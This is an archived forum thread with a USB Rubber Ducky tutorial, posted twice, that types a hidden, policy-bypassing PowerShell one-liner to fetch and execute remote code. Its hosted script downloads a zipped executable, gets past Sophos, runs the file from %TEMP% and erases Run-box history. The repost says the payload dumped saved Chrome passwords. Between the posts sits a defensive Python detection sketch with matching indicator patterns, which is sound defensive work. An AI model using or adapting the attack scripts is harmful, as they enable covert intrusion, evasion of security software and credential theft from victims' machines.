Archived

This topic is now archived and is closed to further replies.

WAZ

3 Second PowerShell Execution. (As much powershell code as you want!)

How does it work / what is it?

I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

This script works by grabbing your PowerShell code from an external website. The code the Ducky inputs is only 93 characters long, which takes the Ducky only around 2 seconds to input.

Tutorial:

First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Remember, though, that these servers may not have 100% uptime.

Script for website:

The code on my website looks something like this...

Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
$arr = (Get-Item -Path $path).Property 
$url = "www.linkToEndPayload"
$output = "$env:temp/test.zip";
$out = "$env:temp/Remake.txt";

Remove-Item -Path $output
Invoke-WebRequest -Uri $url -OutFile $output

Unzip $output "$env:temp/"
Rename-Item -Path $out -NewName "Remake.exe"

Start-Process -FilePath "$env:temp/Remake.exe"

foreach($item in $arr) 
{ 
   if($item -ne "MRUList") 
   { 
     Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
   } 
}

This code downloads the .EXE payload (which is stored in a .ZIP file). We will be running this file on our subject's system. Then the code uses an imported C# library to extract the .ZIP file, which allows us to bypass a web protection software called Sophos that would otherwise block the .EXE we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the Run box history that the Ducky creates.

Finally, we have to set up the Ducky. The Ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

Script for ducky:

DELAY 500
GUI r
DELAY 100
STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
ENTER

That's it! Very fast PowerShell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to an internet connection.

PS: I'm not very good at PowerShell Scripting :wacko:
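From the defender's side, the two scripts above leave a recognisable combination of traces: a hidden, policy-bypassing PowerShell launched from the Run box that fetches remote text and hands it to Invoke-Expression, and a script block that extracts a zip, launches a binary from %TEMP% and wipes RunMRU. The following is an added detection sketch in Python, not code from WAZ's post or from Hak5. It scans constructed records shaped like Security Event 4688 / Sysmon Event 1 command lines and PowerShell Event 4104 script-block text; the domains, paths and parent processes in the samples are placeholders, not real telemetry.

```python
"""Detection sketch for the Ducky stager pattern discussed in the thread.

Added example, not code from the original post or from Hak5. The event
records below are constructed samples shaped like Security 4688 / Sysmon 1
CommandLine fields and PowerShell 4104 ScriptBlockText; domains and paths
are placeholders.
"""
import re
from dataclasses import dataclass

# (name, pattern). The parameter patterns accept the abbreviated forms
# PowerShell allows (-w / -WindowStyle, -ep / -Exec / -ExecutionPolicy).
INDICATORS = [
    ("hidden_window", re.compile(r"-w[a-z]*\s+hidden\b", re.I)),
    ("exec_bypass", re.compile(r"-e[a-z]*\s+bypass\b", re.I)),
    ("web_download", re.compile(
        r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile)\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:invoke-expression|iex)\b", re.I)),
    ("zip_extract", re.compile(r"ZipFile\]::ExtractToDirectory", re.I)),
    ("exec_from_temp", re.compile(r"Start-Process\b.*\$env:temp", re.I)),
    # RunMRU is read first and its properties removed later in the same block.
    ("runmru_cleanup", re.compile(r"RunMRU[\s\S]*Remove-ItemProperty", re.I)),
]


@dataclass
class Finding:
    event_id: str
    verdict: str
    indicators: list
    run_box_launch: bool   # hidden PowerShell with explorer.exe as parent


def classify(text):
    """Return (verdict, indicator names) for one command line or script block."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    found = set(hits)
    if {"web_download", "invoke_expression"} <= found:
        verdict = "stager"        # fetch remote text and evaluate it: the Ducky one-liner
    elif {"zip_extract", "exec_from_temp"} <= found or "runmru_cleanup" in found:
        verdict = "dropper"       # unpack, run from %TEMP%, wipe Run-box history
    elif len(found) >= 2:
        verdict = "suspicious"    # e.g. hidden window plus policy bypass
    else:
        verdict = "benign"        # a single indicator is routine admin usage
    return verdict, hits


def scan(events):
    """Apply classify() to each record; keep everything that is not benign."""
    findings = []
    for ev in events:
        verdict, hits = classify(ev["text"])
        if verdict == "benign":
            continue
        # Keystrokes typed into the Run box make explorer.exe the parent process.
        parent = (ev.get("parent") or "").lower()
        run_box = parent == "explorer.exe" and "hidden_window" in hits
        findings.append(Finding(ev["id"], verdict, hits, run_box))
    return findings


# Constructed 4104 ScriptBlockText, shaped like the hosted script in the thread.
SCRIPT_BLOCK = r'''Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process -FilePath "$env:temp/Remake.exe"
Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue'''

# Constructed event records (not real telemetry).
SAMPLE_EVENTS = [
    {"id": "4688", "parent": "explorer.exe",
     "text": "powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest "
             "http://stager.example.invalid/script.txt; Invoke-Expression $a"},
    {"id": "4104", "parent": None, "text": SCRIPT_BLOCK},
    {"id": "4688", "parent": "svchost.exe",
     "text": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"id": "4688", "parent": "cmd.exe",
     "text": "powershell -Command \"Invoke-WebRequest https://updates.example.invalid/r.json -OutFile r.json\""},
    {"id": "4688", "parent": "explorer.exe",
     "text": r"powershell -w hidden -ep bypass -File C:\Users\Public\x.ps1"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.event_id}: {f.verdict:<10} run_box={f.run_box_launch} {', '.join(f.indicators)}")
```

Two points the sketch is built around. First, because the hosted script clears RunMRU, the Run-box history is not an artifact a responder can count on; process creation auditing with command-line capture (4688, or Sysmon Event 1) and script block logging (4104) record the command regardless of that cleanup. Second, a lone -ExecutionPolicy Bypass or Invoke-WebRequest is everyday admin usage, so the rules only escalate on combinations; the fetch-and-Invoke-Expression pair is the one that maps directly onto the Ducky line. Wrapping the .EXE in a zip may get it past download inspection, but the binary is still written to %TEMP% and executed there, which is where endpoint controls get their turn.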

2 minutes ago, WAZ said:

How does it work / what is it?

I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

This script works by grabbing your PowerShell code from an external website. The code the Ducky inputs is only 93 characters long, which takes the Ducky only around 2 seconds to input.

Tutorial:

First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Remember, though, that these servers may not have 100% uptime.

Script for website:

The code on my website looks something like below. You can put whatever you want in here. Personally, I used it to download an .EXE which dumps saved Chrome passwords into a database using an API we created.


Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
$arr = (Get-Item -Path $path).Property 
$url = "www.linkToEndPayload"
$output = "$env:temp/test.zip";
$out = "$env:temp/Remake.txt";

Remove-Item -Path $output
Invoke-WebRequest -Uri $url -OutFile $output

Unzip $output "$env:temp/"
Rename-Item -Path $out -NewName "Remake.exe"

Start-Process -FilePath "$env:temp/Remake.exe"

foreach($item in $arr) 
{ 
   if($item -ne "MRUList") 
   { 
     Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
   } 
}

This code downloads the .EXE payload (which is stored in a .ZIP file). We will be running this file on our subject's system. Then the code uses an imported C# library to extract the .ZIP file, which allows us to bypass a web protection software called Sophos that would otherwise block the .EXE we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the Run box history that the Ducky creates.

Finally, we have to set up the Ducky. The Ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

Script for ducky:


DELAY 500
GUI r
DELAY 100
STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
ENTER

That's it! Very fast PowerShell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to an internet connection.

PS: I'm not very good at PowerShell Scripting :wacko: + First post!

 
